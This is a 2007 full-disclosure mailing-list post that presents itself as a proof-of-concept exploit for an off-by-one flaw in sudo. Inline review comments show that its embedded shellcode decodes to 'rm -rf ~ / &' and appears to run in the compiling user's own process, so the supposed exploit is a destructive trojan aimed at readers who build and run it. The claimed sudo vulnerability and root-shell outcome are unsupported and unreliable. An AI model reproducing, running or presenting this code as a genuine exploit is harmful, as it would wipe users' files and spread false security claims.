Date: Sun, 5 Aug 2007 15:48:13 -0700 (PDT)
From: Beyond Security <beyondsequritee@...oo.com>
To: full-disclosure@...ts.grok.org.uk
Subject: [Beyond Security] New sudo off-by-one poc exploit.

/*
 *  off by one ebp overwrite in sudo prompt parsing
function
 *  discovered by beyond security in 2007, thx ge
 *
 *  to compile: gcc -pipe -o sobo sobo.c ; ./sobo
 *
 *  please use responsibly! a patch has already been
sent 
 *  upstream and a fix will be included in the next
sudo release
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#define SPROMPT "%u@%h> \\%"
/* `shellcode` is merely an alias for the `esp` array defined below.  The
 * identifier is the usual spelling of the x86 stack-pointer register, which
 * makes get_sp() further down read like stack-pointer code when it is not. */
#define shellcode esp
/* NOTE(review): both counts are passed to exp() as `char` parameters (see
 * its prototype).  Where char is signed -- the default on x86 -- 246 does
 * not fit and arrives as -10. */
#define RETS_NUM 246
#define NOPS_NUM 116

/* NOTE(review): these bytes are not the cp/chmod helper the trailing text
 * suggests.  Read as 32-bit x86: four dwords are pushed
 * (68 ff ff ff ff / 68 df d0 df d9 / 68 8d 99 df 81 / 68 8d 92 df d2) and
 * then inverted in place by four `notl` instructions (f7 16, f7 56 04,
 * f7 56 08, f7 56 0c).  The inverted bytes spell "rm -rf ~ / &", and that
 * string -- not the visible cp/chmod text, which is never referenced -- is
 * what is passed as the `-c` argument to /bin/sh by the execve syscall
 * (b0 0b / cd 80).  In other words this sample is a destructive trojan
 * rather than a proof of concept.  The array is forced into .text so that
 * it is executable and get_sp() can hand out its address as a jump target. */
char esp[] __attribute__ ((section(".text"))) /* executable section, see
note above */
		= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
		  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
		  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
		  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
		  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
		  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
		  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
		  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

/*
 * Overwrite the leading whole words of buff with val.
 *
 * buff: destination bytes (must be suitably aligned for unsigned long)
 * size: length of buff in bytes; only size / sizeof(unsigned long) words
 *       are written and any trailing partial word is left untouched
 * val:  the word value stored in every written slot
 */
void fill (char *buff, int size, unsigned long val) {
  /* The byte count is promoted to size_t for the division and the quotient
   * narrowed back to int; callers are expected to pass non-negative sizes. */
  int words = (int) ((size_t) size / sizeof (unsigned long));
  unsigned long *dst = (unsigned long *) buff;
  for (int i = 0; i < words; i++) {
    dst[i] = val;
  }
}

/*
 * NOTE(review): despite the name this does not read the stack pointer.
 * In AT&T syntax a register is written `%esp`; a bare `esp` is the *symbol*
 * `esp`, i.e. the global shellcode array above (placed in .text by its
 * section attribute).  `lea esp, %eax` therefore loads the address of that
 * array into %eax.  There is no return statement, so the caller only
 * receives that value because it happens to be left in %eax -- undefined
 * behaviour in standard C, and a name that obscures what is returned.
 */
unsigned long get_sp (void) {
  __asm__ ("lea esp, %eax");
}

/*
 * Build the string handed to sudo as its password prompt.
 *
 * nops_nums / rets_nums: byte counts for the NOP and address runs (as
 *                        `char`, so RETS_NUM 246 arrives as -10 where
 *                        char is signed)
 * shellcode:             bytes spliced between the two runs
 * Returns a pointer to a static buffer, or NULL if the computed size does
 * not fit.  Also shadows exp(3) from libm; math.h is not included here so
 * it links, but the name is a hazard.
 *
 * NOTE(review): with rets_nums == -10, alloca() is handed (size_t)-10 and
 * moves the stack pointer the wrong way; the later fill() then writes
 * 246 bytes' worth of copies of `ret` -- the address of the shellcode
 * array (see get_sp) -- through `rets`, which appears to overwrite this
 * function's own frame, presumably including its return address.  If so,
 * the embedded payload runs in this process before sudo is ever exec'd.
 * Confirm under a debugger before relying on that reading.
 */
char *exp (char nops_nums, char rets_nums, char
*shellcode) {
  int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
  unsigned char *nops = alloca (nops_nums);
  unsigned char *rets = alloca (rets_nums);
  unsigned long ret = get_sp ();
  static char exp_buffer [8192];
  /* ensure isatty() fails -- note this also closes fd 2, so the
   * fprintf(stderr, ...) below can never be seen */
  close (0); close (1); close (2);
  fill (nops, (unsigned char) nops_nums, 0x90909090);
  fill (rets, (unsigned char) rets_nums, ret);
  /* signed/unsigned comparison: a negative size is treated as huge */
  if (size > sizeof (exp_buffer)) {
    fprintf (stderr, "buffer is too small\n");
    return NULL;
  }
  /* NOTE(review): nops and rets are not NUL-terminated, so each %s reads
   * until the first zero byte; for `rets` that depends on the bytes of the
   * address value.  `shellcode` stops at the NUL after "/bin/sh", so the
   * trailing cp/chmod text never reaches the prompt either. */
  snprintf (exp_buffer, sizeof (exp_buffer),
"%s%s%s%s",
  SPROMPT, nops, shellcode, rets);
  return exp_buffer;
}

/*
 * Entry point.  NOTE(review): the parameters are named backwards (argv is
 * the count, argc the vector); neither is used.  exp() may return NULL,
 * in which case execl's argument list ends early.  Given the behaviour
 * noted on exp(), it is doubtful execution reaches execl at all.
 */
int main(int argv, char *argc[]) {
  char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
  execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
  /* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" -- NOTE(review): nothing in this file demonstrates that;
the embedded payload decodes to something else entirely (see the note on
the `esp` array). */
  return 0;
}


       
____________________________________________________________________________________
Got a little couch potato? 
Check out fun summer activities for kids.
http://search.yahoo.com/search?fr=oni_on_mail&p=summer+activities+for+kids&cs=bz 


       
____________________________________________________________________________________
Looking for a deal? Find great prices on flights and hotels with Yahoo! FareChase.
http://farechase.yahoo.com/
